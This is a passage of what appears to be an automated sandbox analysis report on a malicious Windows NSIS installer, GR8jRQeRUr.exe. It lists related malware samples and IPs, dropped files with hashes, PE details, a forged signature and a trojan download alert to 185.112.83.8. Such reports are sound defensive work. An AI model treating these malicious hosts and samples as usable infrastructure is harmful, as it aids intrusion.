                                                                                                                                                      • 194.26.229.202
                                                                                                                                                      pandora.x86Get hashmaliciousBrowse
                                                                                                                                                      • 140.203.173.41
                                                                                                                                                      mixfive_20211216-221155.exeGet hashmaliciousBrowse
                                                                                                                                                      • 194.26.229.202
                                                                                                                                                      BbyanR0wSyGet hashmaliciousBrowse
                                                                                                                                                      • 87.46.50.13
                                                                                                                                                      BDg8ttvbSAGet hashmaliciousBrowse
                                                                                                                                                      • 87.46.255.114
                                                                                                                                                      2e6ee519c03027ea1b07d81a8ff35e5ea98ba60df7024.exeGet hashmaliciousBrowse
                                                                                                                                                      • 194.26.229.202
                                                                                                                                                      sora.arm7Get hashmaliciousBrowse
                                                                                                                                                      • 87.46.9.115
                                                                                                                                                      riyxbaywCVGet hashmaliciousBrowse
                                                                                                                                                      • 140.203.136.76
                                                                                                                                                      fsCLsmtz0bGet hashmaliciousBrowse
                                                                                                                                                      • 149.153.99.182
                                                                                                                                                      SDyvieO2uaGet hashmaliciousBrowse
                                                                                                                                                      • 87.46.25.67
                                                                                                                                                      61KiF94nKNGet hashmaliciousBrowse
                                                                                                                                                      • 193.1.217.2
                                                                                                                                                      OhDPOb1tfBGet hashmaliciousBrowse
                                                                                                                                                      • 87.42.38.235
                                                                                                                                                      b3astmode.x86Get hashmaliciousBrowse
                                                                                                                                                      • 157.190.234.158
                                                                                                                                                      YisraengBPGet hashmaliciousBrowse
                                                                                                                                                      • 157.190.234.161
                                                                                                                                                      sys.exeGet hashmaliciousBrowse
                                                                                                                                                      • 87.47.94.109
                                                                                                                                                      MTjXit7IJnGet hashmaliciousBrowse
                                                                                                                                                      • 140.203.173.64
                                                                                                                                                      ROmaIReA65Get hashmaliciousBrowse
                                                                                                                                                      • 157.190.234.139
                                                                                                                                                      wp0L4jqdI7Get hashmaliciousBrowse
                                                                                                                                                      • 87.41.215.196
                                                                                                                                                      6Ml1jBGSomGet hashmaliciousBrowse
                                                                                                                                                      • 87.41.215.186
                                                                                                                                                      arm6-20211126-2221Get hashmaliciousBrowse
                                                                                                                                                      • 87.45.243.144
                                                                                                                                                      SUPERSERVERSDATACENTERRUSecuriteInfo.com.generic.ml.1574.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.112.83.8
                                                                                                                                                      63rK4V9GI0.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.81.115
                                                                                                                                                      y42PCZxs66.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.112.83.69
                                                                                                                                                      I3RG004vXg.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.81.115
                                                                                                                                                      25t8ORqXKy.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.81.115
                                                                                                                                                      CMPL-482407082-Dec-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.202.146
                                                                                                                                                      CMPL-482407082-Dec-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.202.146
                                                                                                                                                      CMPL-1180666149-Dec-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.202.146
                                                                                                                                                      CMPL-1180666149-Dec-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.202.146
                                                                                                                                                      cDS23G8BEL.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.81.115
                                                                                                                                                      4atgpns2qX.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.81.115
                                                                                                                                                      UDf4CoTAIn.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.81.115
                                                                                                                                                      mixfive_20211216-221155.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.112.83.8
                                                                                                                                                      CMPL-1749276574-Dec-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.202.146
                                                                                                                                                      CMPL-1749276574-Dec-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.202.146
                                                                                                                                                      CMPL-979638206-Dec-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.202.146
                                                                                                                                                      CMPL-979638206-Dec-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.202.146
                                                                                                                                                      CMPL-1412434014-Dec-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.202.146
                                                                                                                                                      CMPL-1412434014-Dec-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.233.202.146
                                                                                                                                                      8edyYF6EM7.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.112.83.69

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dllSecuriteInfo.com.generic.ml.1574.exeGet hashmaliciousBrowse
                                                                                                                                                        mixfive_20211216-221155.exeGet hashmaliciousBrowse
                                                                                                                                                          smartsrceen.exeGet hashmaliciousBrowse
                                                                                                                                                            jk.exeGet hashmaliciousBrowse
                                                                                                                                                              smartsrceen.exeGet hashmaliciousBrowse
                                                                                                                                                                zqFJ1f2nsb.exeGet hashmaliciousBrowse
                                                                                                                                                                  psKgUefTFV.exeGet hashmaliciousBrowse
                                                                                                                                                                    TstA9rMmLD.exeGet hashmaliciousBrowse
                                                                                                                                                                      DUNNlMs4ft.exeGet hashmaliciousBrowse

                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GR8jRQeRUr.exe.log
                                                                                                                                                                        Process:C:\Users\user\Desktop\GR8jRQeRUr.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2291
                                                                                                                                                                        Entropy (8bit):5.3192079301865585
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:MIHKmfHK5HKXAHKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHK1HxLHG1qHqH5HX:Pqaq5qXAqLqdqUqzcGYqhQnoPtIxHbqG
                                                                                                                                                                        MD5:2308F672881D77B53310A221B4D27E95
                                                                                                                                                                        SHA1:80371C7B5D415DC46F2BB4BA872B14AF0B0EED8B
                                                                                                                                                                        SHA-256:83D6F5E305A78D3EAB05CFB58D8595FECB2755E80978C6D6236AEF9186E65CDB
                                                                                                                                                                        SHA-512:ECFBCDFAA24CEE02DFAD3175043FF4408F100E0867A66AE3AF14C2C7CB572E451C052A4D5FA452F6FB5C732C082DA7AB321F58CF65E37862E777EEF4DADDC652
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\a.txt
                                                                                                                                                                        Process:C:\Users\user\Desktop\GR8jRQeRUr.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):23
                                                                                                                                                                        Entropy (8bit):2.2068570640942187
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:jNDBfN:jNVfN
                                                                                                                                                                        MD5:6C3AA179406696C66ACF8DC984ABC7DF
                                                                                                                                                                        SHA1:7F66AB35CA41A3449382F9DA68864D64EC182F28
                                                                                                                                                                        SHA-256:798DF5B3298985AE022F8C5A6714F7891EAA49B2E4B24E3A8B2329C04DD11C71
                                                                                                                                                                        SHA-512:7551B1FBE1CAEF52FD0AFC8601DCD0D6F013198FCC7CBF57F42EB090577B34B91E6F4ADCE1A76BC7FFD95559A3FDD529FE6DE90B8335EF8E901CBB606DDAE836
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: ghdfhjfghfgjfdghfghfgdh
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll
                                                                                                                                                                        Process:C:\Users\user\Desktop\GR8jRQeRUr.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):12288
                                                                                                                                                                        Entropy (8bit):5.814115788739565
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                                                                        MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                                                                        SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                                                                        SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                                                                        SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Virustotal, Detection: 2%, Browse
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: SecuriteInfo.com.generic.ml.1574.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: mixfive_20211216-221155.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: smartsrceen.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: jk.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: smartsrceen.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: zqFJ1f2nsb.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: psKgUefTFV.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: TstA9rMmLD.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: DUNNlMs4ft.exe, Detection: malicious, Browse
                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scandinavians.dat
                                                                                                                                                                        Process:C:\Users\user\Desktop\GR8jRQeRUr.exe
                                                                                                                                                                        File Type:DOS executable (COM)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):47076
                                                                                                                                                                        Entropy (8bit):7.7331462076116155
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:qneRjGe0/k9YQxywdhTIve57M6GHawBvGZ0/z6ZPNb8xLWNLxIVtEm71amrVwyQb:WeRjs/Yxyoo+ZGHawBvGomlhuKLmVtEz
                                                                                                                                                                        MD5:278CC0FC489840159F50217B89BC6910
                                                                                                                                                                        SHA1:D7FD2CAE331A3F6EFCD5A9EB287BA06D4FECD9B5
                                                                                                                                                                        SHA-256:C2B2E9906FE79CCE8E2AA4EDD79DE576275A7F2163C781BB4A7209BDFCF3EF20
                                                                                                                                                                        SHA-512:E423F1735F68970B39AC81D3E8D81C5F9CD308462908EB230C41F21229EE279AC64013F0534E4AEFE2630DB4D90506A19DBB8650FB994FB542FB2D4BE8DF96D9
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: .__.?.u.....u.....u..........x....[-4k...z.9..d........,....*..b...W..x...Z1..4..W.X....9.u.W........X.R!DA...x........o...z...$i%... q.'.X..:..U7k........nJLo..9.y.E.5.P.S..B.N......-)..E.d..@.....N..>.........!.2..j........F....s.?Vv(W...Z.l.\).n.lBT.\..,|8.....M/..qc.........b.^pROt.7..=......Bw..I.6.P.D.......N...Z...z.....Dk.,];LU.X...4i...oT...N...Z...z.....Dk.,];LU.X...4i...oT.*..`.o.a.|[..&.O..T.../9...L[.....t.T.............{....1|.hn1a....5]..........y$...0.N.........r.A.....1~.O...;f.3...z@......p...>.2V.X.W.X..y.N.0..W.Xh.?....6.......{.}.h.1.E..X6.p.J..w..3....>..8n..O.....k......0Fh.j.8JT.Y.-..2h....Tn2....Xh...Z..fn.....|{'..h.:..;..s......{...-../.X..v...3.CK}..3.DJ.3....X....CKC........X..1X.W}..sHX..p..U.X......r..U.X6..e...Y.....W.X.DUX...|.._{[n2.zs..s..zs.|...>..x4*_.{.:}.6.5Mg.................]3...;.EFm..u..:sD..5@..F.:s.h.rxl*.J...*.f.....w.?+.m.xl*......)...|.....^..o./..'.*....x...c.b Y..z..}p.~Zt...>O...GJ.'..

                                                                                                                                                                        Static File Info

                                                                                                                                                                        General

                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                        Entropy (8bit):7.5273933240536195
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:GR8jRQeRUr.exe
                                                                                                                                                                        File size:96104
                                                                                                                                                                        MD5:30a35b83c44aba13ee4ea4ee11003419
                                                                                                                                                                        SHA1:abbb71291df7529f46f8d5896f1bb60e2a4afc21
                                                                                                                                                                        SHA256:fee1019ba9c5d5229717f864c5dc8e1b49150b0c4db83f4a2c9b36d51eb03025
                                                                                                                                                                        SHA512:7db17648940923b8874cf53d790f4c3daccc429aeb3207276662286481a4dee6b967a1e94d2259b2f7753e34fdba04fda9e423056ead83024fa2cb5b7896420a
                                                                                                                                                                        SSDEEP:1536:K/T2X/jN2vxZz0DTHUpouMJbPxxE+1fHWUyRCEBaOoqhkG6owwDQCGgVOP:KbG7N2kDTHUpouMJbPxPfHryBa7JNVwk
                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

                                                                                                                                                                        File Icon

                                                                                                                                                                        Icon Hash:b2a88c96b2ca6a72

                                                                                                                                                                        Static PE Info

                                                                                                                                                                        General

                                                                                                                                                                        Entrypoint:0x40352d
                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                        Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:4
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                        Signature Issuer:E=hanks@Adjudicata5.Sce, CN=RDVINSGLASSENES, OU=Marekanite, O=Blomsterkostes5, L=Ukunstnerisk7, S=Gudda9, C=PW
                                                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                        Error Number:-2146762487
                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                        • 12/17/2021 3:51:51 AM 12/17/2022 3:51:51 AM
                                                                                                                                                                        Subject Chain
                                                                                                                                                                        • E=hanks@Adjudicata5.Sce, CN=RDVINSGLASSENES, OU=Marekanite, O=Blomsterkostes5, L=Ukunstnerisk7, S=Gudda9, C=PW
                                                                                                                                                                        Version:3
                                                                                                                                                                        Thumbprint MD5:28E577EE268CB0B7C99D6F9414F64A55
                                                                                                                                                                        Thumbprint SHA-1:D574BF837B6A4CD7DAC81370347084233088AD42
                                                                                                                                                                        Thumbprint SHA-256:8425146360DCA3E16F58EC37F105AC01A88D202A6A89685C900BB42489277395
                                                                                                                                                                        Serial:00

                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                        Instruction
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        sub esp, 000003F4h
                                                                                                                                                                        push ebx
                                                                                                                                                                        push esi
                                                                                                                                                                        push edi
                                                                                                                                                                        push 00000020h
                                                                                                                                                                        pop edi
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push 00008001h
                                                                                                                                                                        mov dword ptr [ebp-14h], ebx
                                                                                                                                                                        mov dword ptr [ebp-04h], 0040A2E0h
                                                                                                                                                                        mov dword ptr [ebp-10h], ebx
                                                                                                                                                                        call dword ptr [004080CCh]
                                                                                                                                                                        mov esi, dword ptr [004080D0h]
                                                                                                                                                                        lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                        push eax
                                                                                                                                                                        mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                                                                        mov dword ptr [ebp-2Ch], ebx
                                                                                                                                                                        mov dword ptr [ebp-28h], ebx
                                                                                                                                                                        mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                                                                        call esi
                                                                                                                                                                        test eax, eax
                                                                                                                                                                        jne 00007F738863234Ah
                                                                                                                                                                        lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                        mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                                                                        push eax
                                                                                                                                                                        call esi
                                                                                                                                                                        mov ax, word ptr [ebp-0000012Ch]
                                                                                                                                                                        mov ecx, dword ptr [ebp-00000112h]
                                                                                                                                                                        sub ax, 00000053h
                                                                                                                                                                        add ecx, FFFFFFD0h
                                                                                                                                                                        neg ax
                                                                                                                                                                        sbb eax, eax
                                                                                                                                                                        mov byte ptr [ebp-26h], 00000004h
                                                                                                                                                                        not eax
                                                                                                                                                                        and eax, ecx
                                                                                                                                                                        mov word ptr [ebp-2Ch], ax
                                                                                                                                                                        cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                                                                        jnc 00007F738863231Ah
                                                                                                                                                                        and word ptr [ebp-00000132h], 0000h
                                                                                                                                                                        mov eax, dword ptr [ebp-00000134h]
                                                                                                                                                                        movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                                                                        mov dword ptr [00434FB8h], eax
                                                                                                                                                                        xor eax, eax
                                                                                                                                                                        mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                                                                        movzx eax, ax
                                                                                                                                                                        or eax, ecx
                                                                                                                                                                        xor ecx, ecx
                                                                                                                                                                        mov ch, byte ptr [ebp-2Ch]
                                                                                                                                                                        movzx ecx, cx
                                                                                                                                                                        shl eax, 10h
                                                                                                                                                                        or eax, ecx

                                                                                                                                                                        Rich Headers

                                                                                                                                                                        Programming Language:
                                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                        Data Directories

                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4c0000xe48.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x162f80x1470.data
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                        Sections

                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .ndata0x360000x160000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rsrc0x4c0000xe480x1000False0.38916015625data4.02680822028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                        Resources

                                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                                        RT_ICON0x4c2080x2e8dataEnglishUnited States
                                                                                                                                                                        RT_DIALOG0x4c4f00x100dataEnglishUnited States
                                                                                                                                                                        RT_DIALOG0x4c5f00x11cdataEnglishUnited States
                                                                                                                                                                        RT_DIALOG0x4c7100xc4dataEnglishUnited States
                                                                                                                                                                        RT_DIALOG0x4c7d80x60dataEnglishUnited States
                                                                                                                                                                        RT_GROUP_ICON0x4c8380x14dataEnglishUnited States
                                                                                                                                                                        RT_VERSION0x4c8500x2b4dataEnglishUnited States
                                                                                                                                                                        RT_MANIFEST0x4cb080x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                                                        Imports

                                                                                                                                                                        DLLImport
                                                                                                                                                                        ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                                                                        ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                                                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                                                        USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                                                                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                                                                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                                                                                                        Version Infos

                                                                                                                                                                        DescriptionData
                                                                                                                                                                        LegalCopyrightAsilum
                                                                                                                                                                        FileVersion1.2.3
                                                                                                                                                                        CompanyNameAsilum company
                                                                                                                                                                        LegalTrademarksAsilum is a trademark of Asilum company
                                                                                                                                                                        CommentsAsilum
                                                                                                                                                                        ProductNameAsilum Application
                                                                                                                                                                        FileDescriptionAsilum Application
                                                                                                                                                                        Translation0x0409 0x04b0

                                                                                                                                                                        Possible Origin

                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                        Network Behavior

                                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                        12/18/21-08:26:53.364210TCP2018752ET TROJAN Generic .bin download from Dotted Quad4979880192.168.2.3185.112.83.8

                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                        TCP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Dec 18, 2021 08:26:53.308614969 CET4979880192.168.2.3185.112.83.8
                                                                                                                                                                        Dec 18, 2021 08:26:53.362879992 CET8049798185.112.83.8192.168.2.3
                                                                                                                                                                        Dec 18, 2021 08:26:53.363086939 CET4979880192.168.2.3185.112.83.8
                                                                                                                                                                        Dec 18, 2021 08:26:53.364209890 CET4979880192.168.2.3185.112.83.8
                                                                                                                                                                        Dec 18, 2021 08:26:53.418927908 CET8049798185.112.83.8192.168.2.3
                                                                                                                                                                        Dec 18, 2021 08:26:53.418976068 CET8049798185.112.83.8192.168.2.3
                                                                                                                                                                        Dec 18, 2021 08:26:53.419004917 CET4979880192.168.2.3185.112.83.8
                                                                                                                                                                        Dec 18, 2021 08:26:53.419029951 CET4979880192.168.2.3185.112.83.8
                                                                                                                                                                        Dec 18, 2021 08:26:53.419059992 CET8049798185.112.83.8192.168.2.3
                                                                                                                                                                        Dec 18, 2021 08:26:53.419112921 CET8049798185.112.83.8192.168.2.3
                                                                                                                                                                        Dec 18, 2021 08:26:53.419131994 CET4979880192.168.2.3185.112.83.8
                                                                                                                                                                        Dec 18, 2021 08:26:53.419171095 CET8049798185.112.83.8192.168.2.3
                                                                                                                                                                        Dec 18, 2021 08:26:53.419210911 CET8049798185.112.83.8192.168.2.3
